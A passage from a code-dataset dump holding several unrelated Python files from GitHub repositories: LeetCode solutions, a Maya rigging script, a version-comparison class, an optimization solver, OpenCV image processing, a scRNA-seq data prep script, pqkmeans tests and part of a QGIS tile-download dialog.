peek元素\n2.\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/stack & queue/32. Longest Valid Parentheses.py","file_name":"32. Longest Valid Parentheses.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40480631773","text":"import collections;\nimport math;\n\nDIR_VEC = ((-1, 0), (1, 0), (0, -1), (0, 1));\n\ndef checkFirstImpossible(gridList : List[List[int]], visitList : List[List[bool]], r : int, c : int) -> bool:\n return ((r < 0) or (r >= len(gridList)) or (c < 0) or (c >= len(gridList[r])) or (gridList[r][c] == 0) or (visitList[r][c] != math.inf));\n\ndef checkSecondImpossible(gridList : List[List[int]], visitList : List[List[bool]], r : int, c : int, dist : int) -> bool:\n return ((r < 0) or (r >= len(gridList)) or (c < 0) or (c >= len(gridList[r])));\n\ndef firstBFS(gridList : List[List[int]], visitList : List[List[bool]], startR : int, startC : int) -> None:\n dq = collections.deque([[startR, startC]]);\n \n while (dq):\n (curR, curC) = dq.popleft();\n \n for (dr, dc) in DIR_VEC:\n (nextR, nextC) = (curR + dr, curC + dc);\n \n if (checkFirstImpossible(gridList, visitList, nextR, nextC)):\n continue;\n \n visitList[nextR][nextC] = -1;\n dq.append([nextR, nextC]);\n \n return None;\n\ndef secondBFS(gridList : List[List[int]], visitList : List[List[bool]], startR : int, startC : int) -> int:\n dq = collections.deque([[startR, startC, 0]]);\n \n while (dq):\n (curR, curC, curDist) = dq.popleft();\n \n # print(curR, curC, curDist);\n # print(visitList);\n \n for (dr, dc) in DIR_VEC:\n (nextR, nextC, nextDist) = (curR + dr, curC + dc, curDist + 1);\n \n if (checkSecondImpossible(gridList, visitList, nextR, nextC, nextDist)):\n continue;\n \n if (gridList[nextR][nextC] == 1):\n if (visitList[nextR][nextC] == -1):\n return curDist;\n elif (visitList[nextR][nextC] == -2):\n continue;\n else: \n if (visitList[nextR][nextC] <= nextDist):\n continue;\n\n visitList[nextR][nextC] = nextDist;\n dq.append([nextR, nextC, nextDist]);\n \n return math.inf;\n\nclass Solution:\n def shortestBridge(self, grid: List[List[int]]) -> int:\n (answer, bfsCnt, visitList) = (math.inf, 0, [[math.inf for _ in range(len(grid[0]))] for _ in range(len(grid))]);\n \n for r in range(len(grid)):\n for c in range(len(grid[r])):\n # print(r, c, grid[r][c], visitList[r][c]);\n \n if ((grid[r][c] == 0) or (visitList[r][c] not in (math.inf, -2))):\n continue;\n\n if (bfsCnt == 0):\n (bfsCnt, visitList[r][c]) = (1, -1);\n firstBFS(grid, visitList, r, c);\n elif (bfsCnt == 1):\n visitList[r][c] = -2;\n answer = min(answer, secondBFS(grid, visitList, r, c));\n\n # print(visitList);\n \n return answer;\n","repo_name":"REVANgers/all-solved-club","sub_path":"members/U02BQ6G1SQJ/leetcode/Array/leetcode934.py","file_name":"leetcode934.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28830370874","text":"def isValidSudoku(board):\n def isValid(a):\n \"\"\"\n a: a list of length 9\n return: boolean\n \"\"\"\n digits = '123456789'\n d = {}\n for c in a:\n if c in digits:\n if c not in d:\n d[c] = 1\n else:\n return False\n elif c != '.':\n return False\n return True\n \n for row in range(9):\n if not isValid(board[row]):\n return False\n \n for column in range(9):\n a = []\n for row in range(9):\n a.append(board[row][column])\n if not isValid(a):\n return False\n \n for i in range(3):\n for j in range(3):\n a = [board[3*i][3*j], board[3*i][3*j+1], board[3*i][3*j+2],\n board[3*i+1][3*j], board[3*i+1][3*j+1], board[3*i+1][3*j+2],\n board[3*i+2][3*j], board[3*i+2][3*j+1], board[3*i+2][3*j+2]]\n if not isValid(a):\n return False\n \n return True","repo_name":"xingyuanp/LeeCodeOJ","sub_path":"Python/valid_sudoku.py","file_name":"valid_sudoku.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74867291846","text":"import maya.cmds as cmds\n\ndef worldRig():\n\t\n\t#ClearSelection\n\n\tcmds.select(clear=True)\n\n\t#Trouver la BB\n\tslc = cmds.select('*:MOD_grp')\n\tbbox = cmds.exactWorldBoundingBox()\n\tslc = cmds.select(clear=True)\n\tbbox = [abs(ele) for ele in bbox] \n\n\t#Creer les joint Root et Ultimate en fonction de la BB\n\tcmds.joint(name='c_root_jnt', p=(0,0,0))\n\tcmds.joint(name='c_ultimate_jnt', p=(0,bbox[4],0))\n\tcmds.select('c_root_jnt')\n\tcmds.group(name='RIG_grp')\n\tcmds.setAttr('RIG_grp.visibility', 0)\n\n\t#Skin des joints a la geo\n\tcmds.select(clear=True)\n\tcmds.select('*:MOD_grp', 'c_root_jnt')\n\tcmds.bindSkin(tsb=True)\n\n\t#Trouver le scale des controleurs\n\t#On retire les valeurs Y de la bounding box puis on trie les valeurs restantes \n\tbbox.remove(bbox[1])\n\tbbox.remove(bbox[3])\n\tbbox.sort()\n\n\t#Creer le Controleur Global, lui donner les bonnes dimensions puis FT et DH\n\tcmds.circle(n='c_global_0001_ctrl', nr=(0,1,0), c=(0,0,0))\n\tcmds.scale(bbox[-1]*2, 1, bbox[-1]*2)\n\tcmds.delete(constructionHistory = True)\n\tcmds.makeIdentity(apply=True, scale=True)\n\tcmds.group(name=\"c_global_0001_off\")\n\n\t#Creer le Controleur Root, lui donner les bonnes dimensions puis FT et DH\n\tcmds.circle(n='c_root_0001_ctrl', nr=(0,1,0), c=(0,0,0))\n\tcmds.scale(bbox[-1]*1.5, 1, bbox[-1]*1.5)\n\tcmds.delete(constructionHistory = True)\n\tcmds.makeIdentity(apply=True, scale=True)\n\tcmds.group(name=\"c_root_0001_off\")\n\tcmds.parent('c_root_0001_off', 'c_global_0001_ctrl')\n\n\tcmds.select('c_global_0001_off')\n\tcmds.group(name='CTRL_grp')\n\n\t#Creer la contrainte entre le ctrl et le joint\n\tcmds.parentConstraint('c_root_0001_ctrl', 'c_root_jnt', maintainOffset=True, weight=1)\n\n\t#Creer un groupe Global\n\tcmds.select('CTRL_grp', 'RIG_grp', '*:MOD_grp')\n\tcmds.group(name='Asset_grp')\n","repo_name":"Amneoxiss/animation_pipeline","sub_path":"vulcain/softwares/dcc/maya/tools/rigging/worldRig/worldRig.py","file_name":"worldRig.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"30734428193","text":"import re # To replace parts of version strings with regex.\nfrom typing import cast, Union, List\n\nfrom UM.Decorators import deprecated\nfrom UM.Logger import Logger\n\n\nclass Version:\n \"\"\"Represents a version number, like \"3.2.8\" and allows comparison of those\n numbers.\n \"\"\"\n\n def __init__(self, version: Union[str, bytes, int, \"Version\", List[Union[int, str, bytes]]]) -> None:\n \"\"\"Constructs the version instance from a string representing the version.\n\n The string representation may have dashes or underscores that separate\n the major, minor and revision version numbers. All text is ignored.\n\n :param version: A string or bytes representing a version number.\n \"\"\"\n\n # FIXME: We should probably swap this whole class out for the semver python package. That is what is used by conan.\n\n super().__init__()\n\n if type(version) == bytes:\n version = cast(bytes, version)\n version = version.decode(\"utf-8\")\n\n if isinstance(version, str):\n version = cast(str, version)\n # Versions are in (MOD-)x.x.x(-POSTFIX.x) format.\n version = version.replace(\"MOD-\", \"\")\n version = version.replace(\"-\", \".\")\n version = version.replace(\"_\", \".\")\n version = version.replace(\"\\\"\", \"\")\n version = version.replace(\"+\", \".\")\n version_list = version.split(\".\") # type: ignore\n # Only the third element (the postfix_type) is allowed to be a string. In other cases all non numeric\n # characters need to be filtered out\n try:\n version_list[0] = re.sub(r\"[A-Z]+\", \"\", version_list[0])\n version_list[1] = re.sub(r\"[A-Z]+\", \"\", version_list[1])\n version_list[2] = re.sub(r\"[A-Z]+\", \"\", version_list[2])\n version_list[4] = re.sub(r\"[A-Z]+\", \"\", version_list[4])\n except IndexError as err:\n pass\n elif isinstance(version, list):\n version_list = version # type: ignore\n elif isinstance(version, int):\n version_list = [version] # type: ignore\n elif isinstance(version, Version):\n version_list = [version.getMajor(), version.getMinor(), version.getRevision(), version.getPostfixType(), version.getPostfixVersion()] # type: ignore\n else:\n Logger.log(\"w\", \"Unable to convert version %s of type %s into a usable version\", version, type(version))\n version_list = []\n\n self._major = 0\n self._minor = 0\n self._revision = 0\n self._postfix_type = \"\"\n self._postfix_version = 0\n try:\n self._major = int(version_list[0])\n self._minor = int(version_list[1])\n self._revision = int(version_list[2])\n self._postfix_type = version_list[3]\n self._postfix_version = int(version_list[4])\n except IndexError:\n pass\n except ValueError:\n pass\n\n def getMajor(self) -> int:\n \"\"\"Gets the major version number.\n\n The major version number is the first number of the version: \"3\" in the\n version \"3.2.8\".\n \"\"\"\n\n return self._major\n\n def getMinor(self) -> int:\n \"\"\"Gets the minor version number.\n\n The minor version number is the second number of the version: \"2\" in the\n version \"3.2.8\".\n \"\"\"\n\n return self._minor\n\n def getRevision(self) -> int:\n \"\"\"Gets the revision or patch version number.\n\n The revision version number is the third number of the version: \"8\" in\n the version \"3.2.8\".\n \"\"\"\n\n return self._revision\n\n def getPostfixType(self) -> str:\n \"\"\"Gets the postfix type.\n\n The postfix type is the name of the postfix, e.g. \"alpha\" in the version \"1.2.3-alpha.4\"\n \"\"\"\n\n return self._postfix_type\n\n def getPostfixVersion(self) -> int:\n \"\"\"Gets the postfix version number.\n\n The postfix version is the last number, e.g. \"4\" in the version \"1.2.3-alpha.4\"\n \"\"\"\n\n return self._postfix_version\n\n @deprecated\n def getWithoutPostfix(self) -> \"Version\":\n \"\"\"Returns this as _only_ a major.minor.revision, without the postfix type/version.\n\n The postfix is everything beyond the patch, like '-beta+1' in 5.0.0-beta+1 -- in this example 5.0.0 is returned.\n \"\"\"\n\n return Version([self._major, self._minor, self._revision])\n\n def hasPostFix(self) -> bool:\n \"\"\"Check if a version has a postfix.\"\"\"\n\n return self._postfix_type != \"\"\n\n def __gt__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is later than the specified version.\n\n Implements the > operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n return other.__lt__(self)\n elif isinstance(other, str):\n return Version(other).__lt__(self)\n else:\n return False\n\n def __lt__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is earlier than the specified version.\n\n Implements the < operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n if self._major < other.getMajor():\n # The major version is lower.\n return True\n if self._minor < other.getMinor() \\\n and self._major == other.getMajor():\n # The minor version is lower.\n return True\n if self._revision < other.getRevision() \\\n and self._major == other.getMajor() \\\n and self._minor == other.getMinor():\n # The revision version is lower.\n return True\n if self.hasPostFix() and other.hasPostFix() \\\n and self._postfix_version < other.getPostfixVersion() \\\n and self._postfix_type == other.getPostfixType() \\\n and self._revision == other.getRevision() \\\n and self._major == other.getMajor() \\\n and self._minor == other.getMinor():\n # The postfix version is lower. This is only allowed if the postfix type is the same!\n return True\n if self.hasPostFix() and not other.hasPostFix():\n # If the root version is the same but the other has no postfix, we consider the other larger.\n # E.g. Version(\"1.0.0\") > Version(\"1.0.0-alpha.7\")\n return Version(\"{}.{}.{}\".format(\n self.getMajor(),\n self.getMinor(),\n self.getRevision()\n )) == other\n return False\n elif isinstance(other, str):\n return self < Version(other)\n else:\n return False\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Indicates whether this version is equal to the specified version.\n\n Implements the == operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n # Direct comparison with same type.\n return self._major == other.getMajor() \\\n and self._minor == other.getMinor() \\\n and self._revision == other.getRevision() \\\n and self._postfix_type == other.getPostfixType() \\\n and self._postfix_version == other.getPostfixVersion()\n\n if isinstance(other, str):\n # Comparison with string by converting to Version first.\n return self == Version(other)\n\n return False\n\n def __ge__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is later or equal to the specified\n version.\n\n Implements the >= operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n return self.__gt__(other) or self.__eq__(other)\n\n def __le__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is earlier or equal to the specified\n version.\n\n Implements the <= operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n return self.__lt__(other) or self.__eq__(other)\n\n def __str__(self) -> str:\n \"\"\"Returns a string representation containing the major, minor and revision\n number.\n\n Such as \"3.2.8\".\n \"\"\"\n\n if self._postfix_type:\n # If we have a postfix, return a string including that postfix.\n return \"%s.%s.%s-%s.%s\"\\\n % (self._major, self._minor, self._revision, self._postfix_type, self._postfix_version)\n return \"%s.%s.%s\" % (self._major, self._minor, self._revision)\n\n def __hash__(self) -> int:\n \"\"\"Returns a number reasonably representing the identity of the version.\"\"\"\n\n return hash(self.__str__())\n","repo_name":"Ultimaker/Uranium","sub_path":"UM/Version.py","file_name":"Version.py","file_ext":"py","file_size_in_byte":9195,"program_lang":"python","lang":"en","doc_type":"code","stars":309,"dataset":"github-code","pt":"99"} +{"seq_id":"23020995761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 15:30:25 2017\n\n@author: tthiem1\n\nA module for running various optimization algorithms on a given objective function.\n\"\"\"\n\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom scipy.spatial.distance import pdist\nfrom itertools import product\nfrom Gradient import Gradient\nfrom Davidenko import Davidenko\nfrom Nesterov import cNesterov\n\nclass OptimizationSolver():\n \"\"\"\n A class for exploring self-similarities in optimization dynamical system solutions.\n \"\"\" \n def __init__(self, InitialConditions, TimeRange, TimeOut, ObjFunc=None, DObjFunc=None, DDObjFunc=None, Algorithm='Gradient'):\n \"\"\"\n Initialize the self-similarity object with the data, the objective\n function and the evolution algorithm.\n \n Parameters\n ----------\n InitialConditions : (np.array) - An array of the initial conditions to use in the dynamical\n system simulation. Shape (#points, #dimensions).\n TimeRange : (np.array) - An array containing the start time and end time for the simulation.\n TimeOut : (int) - The number of points in time to output the results of the optimization.\n Positions : (np.array) - An array of the positions of the points after each optimization algorithm time step.\n Shape (#points, #dimensions, #times).\n ObjFunc : (function) - The objective function.\n DObjFunc : (function) - The derivative or Jacobian of the objective function.\n DDObjFunc : (function) - The second derivative or Hessian of the objective function.\n Algorithm : (string) - The evolution algorithm to use for the dynamical system. Possible values:\n 'Newton' : the Newton method, 'Davidenko' : a continuous version of the Newton method,\n 'Nesterov' : an accelerated gradient based optimization algorithm, 'Gradient' : the gradient descent method.\n \"\"\"\n\n self.Times = np.linspace(TimeRange[0], TimeRange[1], TimeOut)\n self.Algorithm = Algorithm\n self.Positions = np.zeros((InitialConditions.shape[0], InitialConditions.shape[1], TimeOut))\n self.Positions[:, :, 0] = InitialConditions\n self.ObjFunc = ObjFunc\n self.DObjFunc = DObjFunc\n self.DDObjFunc = DDObjFunc\n \n def Simulate(self):\n \"\"\"\n Simulate the dynamics of various optimization algorithms.\n \n Parameters\n ----------\n Algorithm : (string) - The evolution algorithm to use for the dynamical system. Possible values:\n 'Newton' : the Newton method, 'Davidenko' : a continuous version of the Newton method,\n 'Nesterov' : an accelerated gradient based optimization algorithm, 'Gradient' : the gradient descent method.\n \n Returns\n -------\n Positions : (np.array) - An array of the positions of the points after each optimization algorithm time step.\n Shape (#times, #points).\n Velocities : (np.array, Nesterov method only) - An array of the velocities of the points after each Nesterov time step.\n Shape (#times, #points).\n \"\"\"\n if self.Algorithm == 'Gradient':\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :] = Gradient(self.Positions[i, :, 0], self.ObjFunc, self.DObjFunc, self.Times)\n elif self.Algorithm == 'Davidenko':\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :] = Davidenko(self.Positions[i, :, 0], self.DObjFunc, self.DDObjFunc, self.Times)\n elif self.Algorithm == 'Nesterov':\n self.Velocities = np.zeros((self.Positions.shape))\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :], self.Velocities[i, :, :] = cNesterov(self.Positions[i, :, 0], self.ObjFunc, self.DObjFunc, self.Times)\n\n def GetDensity(self, action='generate', samples=100, draws=None):\n \"\"\"\n TODO: Check density calculations for multiple dimensions.\n Generate a density estimation of the positions at each time or sample positions\n from the generated density at a specified time.\n \n Parameters\n ----------\n action : (string) - Options: 'generate', 'sample'.\n 'generate' : Generate a density estimation using kernel density estimation and save it.\n 'sample' : Generate a density estimation at the final time and both draw and return samples\n from it equal to the number of points in position.\n samples : (int) - The number of sample points in each dimension at which to measure the density.\n Total number of points is samples ** dimensions.\n draws : (int) - The number of points to draw from the density distribution, if None,\n draw a number of points equal to the number of points in Positions.\n \n Returns\n -------\n 'generate' \n DensitySamples : (np.array) - An array of the positions of the points used to sample the density.\n Density : (np.array) - The value of the density evaluated at each points in DensitySamples.\n 'sample'\n samples : (np.array) - An array of the samples drawn from the density generated from the positions\n at the final time.\n \"\"\"\n if action == 'generate':\n# A list of sample arrays ranging from the min value to the max value in each dimension.\n minmax = [np.linspace(np.amin(self.Positions[:, i, :]), np.amax(self.Positions[:, i, :]), samples) for i in range(self.Positions.shape[1])]\n self.DensitySamples = np.array(list(product(*minmax)))\n self.Density = np.zeros((self.DensitySamples.shape[0], self.Times.shape[0]))\n \n for i in range(self.Positions.shape[2]):\n bandwidth = 0.2 * np.mean(pdist(self.Positions[:, :, i]))\n KDE = KernelDensity(bandwidth=bandwidth, kernel='gaussian', metric='euclidean')\n KDE.fit(self.Positions[:, :, i])\n self.Density[:, i] = np.exp(KDE.score_samples(self.DensitySamples))\n \n elif action == 'sample':\n bandwidth = min(pdist(self.Positions[-1, :][:, np.newaxis]))\n KDE = KernelDensity(bandwidth=bandwidth, kernel='gaussian', metric='euclidean')\n KDE.fit(self.Positions[-1, :][:, np.newaxis])\n if draws is None:\n draws = self.Positions.shape[1]\n return KDE.sample(draws)\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n# InitialConditions = np.array([(x, y) for x in range(-2, 3) for y in range(-2, 3)])\n InitialConditions = np.array([(np.sin(x), np.cos(x)) for x in 2 * np.pi * np.linspace(0, 0.99, 100)])\n TimeRange = [0, 5]\n TimeOut = 100\n ObjFunc = lambda x: x[0] ** 2 + x[1] ** 2\n DObjFunc = lambda x: np.array((2 * x[0], 2 * x[1]))\n DDObjFunc = lambda x: np.array([[2, 0], [0, 2]])\n methods = ['Gradient', 'Davidenko', 'Nesterov']\n fig, ax = plt.subplots(1, 3, figsize=(12, 4))\n for i in range(3):\n optimization = OptimizationSolver(InitialConditions, TimeRange, TimeOut, ObjFunc, DObjFunc, DDObjFunc, Algorithm=methods[i])\n optimization.Simulate()\n for j in range(InitialConditions.shape[0]):\n ax[i].scatter(optimization.Positions[j, :, :][0, :], optimization.Positions[j, :, :][1, :])\n ax[i].set_title(methods[i])\n ax[i].set_xlabel('Time')\n ax[i].set_xlabel('Position')\n plt.tight_layout()\n","repo_name":"TThiem/algorithms","sub_path":"src/OptimizationSolver.py","file_name":"OptimizationSolver.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40813322831","text":"# 导入工具包\nimport numpy as np\nimport cv2\ndef resize(image, width=None, height=None, inter=cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n resized = cv2.resize(image, dim, interpolation=inter)\n return resized\n\n\nimage = cv2.imread('example/1.png')\n#坐标也会相同变化\nratio = image.shape[0] / 500.0\norig = image.copy()\nimage = resize(orig, height = 500)\n\n# 预处理\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n# 输入图像必须是float32, 最后一个参数[0.04,0.06]\ndst = cv2.cornerHarris(gray, 2, 3, 0.1)\ncv2.imshow('dst', dst)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''\ngray = cv2.GaussianBlur(gray, (3, 3), 0) # 高斯滤波\n# 使用Sobel算子\nedged = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n# edged = cv2.threshold(edged, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n# 展示预处理结果\nprint(\"STEP 1: 边缘检测\")\ncv2.imshow(\"Image\", image)\ncv2.imshow(\"Edged\", edged)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\ncnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]\ncnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n# 遍历轮廓\nfor c in cnts:\n # 计算轮廓近似\n peri = cv2.arcLength(c, True)\n # c表示输入的点集\n # epsilon表示从原始轮廓到近似轮廓的最大距离,它是一个准确度参数\n # True表示封闭的\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n # 4个点的时候就拿出来\n if len(approx) == 4:\n screenCnt = approx\n break\n# 展示结果\nprint(\"STEP 2: 获取轮廓\")\ncv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\ncv2.imshow(\"Outline\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''","repo_name":"DeepDream1128/MailingSheet","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24143508555","text":"#!/usr/bin/python\n#' Requiements:\n#' \n#' 1. Python 2.7 or greater\n#' 2. Packages:\n#' 'Python'\n#' numpy (>=1.8.2)\n#' scipy (>=0.13.3)\n#' scikit-learn (>=0.20)\n#' imbalanced-learn (0.4)\n#' pip install -U numpy\n#' pip install -U scipy\n#' pip install -U scikit-learn\n#' pip install -U imbalanced-learn\n#' pip install -U sklearn\n#'\n#' Please cite our paper if our paper or code helped you.\n#'\n\n###################################\n\n\nimport os\nimport re\nimport sys\n\n\nmarkerL=open(sys.argv[1],'r')#marker list, which used in train_MarkerCheck.R \ncellType=open(sys.argv[2],'r')#cell type list\nnormTrEx1=open(sys.argv[3],'r')#normalized scRNA-Seq from train_MarkerCheck.R\nnormTrEx2=open(sys.argv[3],'r')#normalized scRNA-Seq from train_MarkerCheck.R\ntrainD=open(sys.argv[4],'w')#ouput of training data\n\n\nmkl=[]\nmkls={}\n\n\nfor line in markerL:\n line=line.strip()\n line=line.split()\n for n in range(0,int(len(line))):\n mkl.append('\"'+line[n]+'\"')\n mkls['\"'+line[n]+'\"']='\"'+line[n]+'\"'\n\n#extract cell type information\n\ncellT={}\nfor line in cellType:\n line=line.strip()\n line=line.split()\n cellT[line[0]]=line[1]\n\n#get normalization value\nnte=[]#normalization value\n\nfor line in normTrEx1:\n line=line.strip()\n lineE=line.split()\n a=0\n if '\"' in lineE[1]:\n for n in range(0,int(len(lineE))):\n a=a+1\n if lineE[n] in mkls:\n nte.append(a)\n\n\n#getting the expression of markers genes\ncellID=''\nexp=''\n\nfor line in normTrEx2:\n line=line.strip()\n lineE=line.split()\n if '\"' in lineE[1]:\n for id in range(0,int(len(lineE))):\n if lineE[id] in mkls.keys():\n cellID=cellID+lineE[id]+' '\n print >>trainD,cellID+' '+'\"Cell_types\"'\n cellID\n\n if '\"' not in lineE[1]:\n \n for value in nte:\n #print value,len(lineE)\n exp=exp+lineE[int(value)]+' '\n if lineE[0] in cellT.keys():\n print >>trainD,lineE[0]+' '+exp+' '+cellT[lineE[0]]\n exp=''\n if lineE[0] not in cellT.keys():\n exp=''\n\nmarkerL.close()\nnormTrEx1.close()\nnormTrEx2.close()\ntrainD.close()\n\n","repo_name":"linwang6/ELSA","sub_path":"python/resources/train_prep.py","file_name":"train_prep.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39882052978","text":"import unittest\nimport pqkmeans\nimport numpy\nimport pipe\n\n\nclass TestPQEncoder(unittest.TestCase):\n def data_source(self, n: int):\n for i in range(n):\n for _ in range(3):\n yield [i * 100] * 6\n\n def setUp(self):\n self.encoder = pqkmeans.encoder.PQEncoder(num_subdim=2)\n\n def test_just_train_array(self):\n input_array = numpy.random.random((300, 10))\n self.encoder.fit(numpy.array(input_array))\n encoded = list(self.encoder.transform(numpy.array(input_array)))\n self.assertEqual(len(input_array), len(encoded))\n\n def test_fit_and_transform_generator(self):\n self.encoder.fit(numpy.array(list(self.data_source(300))))\n\n # infinite list\n encoded = self.encoder.transform_generator(self.data_source(100000000)) | pipe.take(60) | pipe.as_list\n\n for i in range(0, len(encoded), 3):\n numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 1])\n numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 2])\n\n def test_transform_and_inverse_transform(self):\n input_array = numpy.random.random((300, 10))\n self.encoder.fit(numpy.array(input_array))\n encoded = self.encoder.transform(numpy.array(input_array))\n decoded = self.encoder.inverse_transform(encoded)\n\n N1, M = encoded.shape\n N2, D = decoded.shape\n self.assertEqual(N1, N2)\n self.assertEqual(M, self.encoder.M)\n self.assertEqual(D, self.encoder.Ds * self.encoder.M)\n self.assertEqual(encoded.dtype, self.encoder.code_dtype)\n","repo_name":"DwangoMediaVillage/pqkmeans","sub_path":"test/encoder/test_pq_encoder.py","file_name":"test_pq_encoder.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"99"} +{"seq_id":"7511529099","text":"'''\nCreated on Jan 9, 2016\n\n@author: dewey\n'''\n\nimport os\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nimport qosmsettings\nimport tilemanagement as tm\nimport openstreetmap as osm\nimport downloaderthread as downloader\nfrom qosmlogging import log\n\nfrom ui_qosm_cachetiles_dialog import Ui_qosmDialogCacheTiles\n\nclass DialogCachetiles(QDialog, Ui_qosmDialogCacheTiles):\n \n def __init__(self, parent, iface):\n \"\"\"Constructor.\"\"\"\n super(DialogCachetiles, self).__init__(parent)\n self.setupUi(self)\n self.extent = None\n self.tiletype = None\n self.iface = iface\n self.thread = None\n self.errors = []\n \n self.maxZoom.valueChanged[\"int\"].connect(self.recalculate)\n self.minZoom.valueChanged[\"int\"].connect(self.recalculate)\n \n self.button_box.accepted.connect(self.do_download)\n self.button_box.rejected.connect(self.reject)\n \n def set_extent(self):\n extent = self.iface.mapCanvas().extent()\n crs = self.iface.mapCanvas().mapRenderer().destinationCrs()\n self.extent = osm.unproject(extent, crs)\n \n def set_tiletype(self, tiletype):\n self.tiletype = tiletype\n self.statusText.setText(\"Ready to download.\")\n self.set_progress(0, 100, False)\n self.doOverwrite.setChecked(False)\n \n def autoset_minmax(self):\n\n extll = self.extent\n \n minzoom = 1\n while len(tiles(extll, minzoom)) == 1:\n minzoom += 1\n \n maxzoom = minzoom + 1\n while (maxzoom <= 21) and len(tiles(extll, minzoom, maxzoom)) < 350: #about 10 mb\n maxzoom += 1\n \n self.minZoom.setValue(minzoom)\n self.maxZoom.setValue(maxzoom)\n self.recalculate()\n \n def recalculate(self, arg=None):\n minzoom = self.minZoom.value()\n maxzoom = self.maxZoom.value()\n if maxzoom < minzoom:\n self.maxZoom.setValue(minzoom)\n maxzoom = minzoom\n if minzoom > maxzoom:\n self.minZoom.setValue(maxzoom)\n minzoom = maxzoom\n \n numtiles = len(tiles(self.extent, minzoom, maxzoom))\n mb = 0.015 * numtiles #approximating heavily\n tiletext = \"tile\" if numtiles == 1 else \"tiles\"\n self.numtilestext.setText(\"%s %s (%0.2f MiB)\" % (numtiles, tiletext, mb))\n \n def do_download(self):\n if not self.thread is None: #don't start another thread if is already downloading\n return\n self.gridLayout.setEnabled(False)\n self.button_box.button(QDialogButtonBox.Ok).setEnabled(False)\n \n minzoom = self.minZoom.value()\n maxzoom = self.maxZoom.value()\n tilelist = tiles(self.extent, minzoom, maxzoom)\n \n self.thread = DownloaderThread(self, self.tiletype, tilelist, self.doOverwrite.isChecked())\n self.thread.finished.connect(self.download_finished)\n self.thread.progress.connect(self.set_progress)\n self.thread.error.connect(self.add_error)\n self.rejected.connect(self.thread.cancel)\n \n log(\"Starting thread\")\n self.thread.start()\n \n @pyqtSlot(int, int)\n def set_progress(self, progress, maximum, updatetext=True):\n self.progressBar.setMaximum(maximum)\n self.progressBar.setValue(progress)\n if updatetext:\n self.statusText.setText(\"Downloading %s of %s tiles%s\" % (progress,\n maximum, \n self.errortext()))\n \n @pyqtSlot(unicode)\n def add_error(self, message):\n self.errors.append(message)\n stext = unicode(self.statusText.text())\n nl = stext.find(\"\\n\")\n firstline = stext[:nl+1] if nl != -1 else stext\n self.statusText.setText(\"%s%s\" % (firstline, self.errortext())) \n \n def errortext(self):\n if self.errors:\n out = \"\\n%s error(s):\\n\" % len(self.errors)\n numerrors = min(10, len(self.errors))\n errorstrings = [self.errors[i] for i in range(len(self.errors)-numerrors, len(self.errors))]\n out += \"\\n\".join(errorstrings)\n return out\n else:\n return \"\"\n \n def download_finished(self):\n log(\"Thread finished\")\n self.thread.finished.disconnect(self.download_finished)\n self.thread.progress.disconnect(self.set_progress)\n self.thread.error.disconnect(self.add_error)\n self.rejected.disconnect(self.thread.cancel)\n \n self.gridLayout.setEnabled(True)\n self.button_box.button(QDialogButtonBox.Ok).setEnabled(True)\n haderrors = len(self.errors) != 0\n self.errors = []\n \n self.thread = None\n \n if not haderrors:\n self.statusText.setText(\"Download 